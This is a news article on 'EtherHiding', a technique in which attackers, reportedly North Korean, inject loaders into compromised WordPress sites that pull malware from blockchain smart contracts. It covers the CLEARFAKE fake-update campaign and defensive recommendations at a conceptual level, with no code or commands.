**EtherHiding: How Hackers Use Blockchain to Host Malware Untraceably**

A new hacking technique known as EtherHiding has emerged, leveraging smart contracts on popular blockchain networks like Ethereum and BNB Smart Chain to host malware. This novel method makes it exceptionally difficult for security teams to detect and remove malicious code due to the immutable nature of blockchain technology.

—

### What Is EtherHiding?

According to Google’s Threat Intelligence Group (GTIG), EtherHiding involves placing small snippets of harmful code inside smart contracts hosted on decentralized blockchain platforms. Once stored on these blockchains, the code cannot be deleted or modified—making traditional takedown methods ineffective.

—

### How EtherHiding Works

Hackers begin by compromising WordPress websites, often exploiting stolen login credentials or unpatched software vulnerabilities. After gaining access, they inject a JavaScript loader into the site’s code. This loader reaches out to a smart contract on a blockchain, pulling malware from there. Since this communication happens off-chain, it leaves almost no transaction trace and requires minimal gas fees.

The campaign using this technique was first identified in September 2023 under the name CLEARFAKE. It employed fake browser update alerts to trick users into installing malicious software, marking one of the earliest known uses of EtherHiding.

—

### Why Blockchain Hosting Makes Malware Hard to Stop

One of blockchain’s core features is immutability—data recorded on the chain cannot be changed. While this is crucial for trust and security, attackers are now exploiting it to hide malware in smart contracts. Because of this, removing or blocking the malicious code would require altering the blockchain itself, which is practically impossible.

Moreover, most anti-malware tools do not currently analyze smart contracts for harmful content, allowing malware to persist undetected for long periods.

GTIG noted, “Although smart contracts offer innovative ways to build decentralized applications, their unchangeable nature is leveraged in EtherHiding.”

Citizen Lab researcher John Scott-Railton described EtherHiding as an “early-stage experiment” but warned that future iterations may become more sophisticated. He suggested potential developments could include malware that directly targets blockchain systems—especially those connected to wallets or transaction platforms.

—

### A Shift in North Korean Cyber Strategy

Cybersecurity experts see EtherHiding as part of a strategic evolution by North Korean state-sponsored hackers. Previously focused primarily on stealing cryptocurrency, they are now harnessing blockchain technology itself to distribute malware and maintain persistent operations.

Blockchain analytics company TRM Labs reports that North Korean hackers have stolen over $1.5 billion in cryptocurrency in 2023 alone, funds that are believed to support military projects and help evade international sanctions.

By embedding malware into decentralized networks, these attackers can continue their campaigns even if the original compromised websites are shut down, moving their tools seamlessly across platforms.

—

### How Users and Developers Can Protect Themselves

GTIG advises the following steps to mitigate the risks associated with EtherHiding:

– **Block unknown or suspicious scripts** running on websites.
– **Disable unauthorized downloads** to prevent automatic malware installation.
– **Keep WordPress plugins and software up to date** to minimize vulnerabilities.
– **Enhance website security** to prevent initial breaches that enable loader injection.
– **Start scanning smart contracts** for malicious code, since blockchain code is public and traceable once identified.

The cybersecurity community is encouraged to monitor and classify harmful smart contracts proactively. Early detection and coordinated labeling can help reduce the impact of these emerging threats.

—

### Conclusion

EtherHiding represents a concerning development in cybercrime, exploiting blockchain’s unique properties to create malware hosting that is resilient to traditional defenses. As attackers innovate, it is critical for users, developers, and security teams to strengthen their defenses, stay informed, and collaborate on new detection methods to combat these sophisticated threats.
https://coincentral.com/north-korean-hackers-use-blockchain-to-hide-malware-in-new-campaign/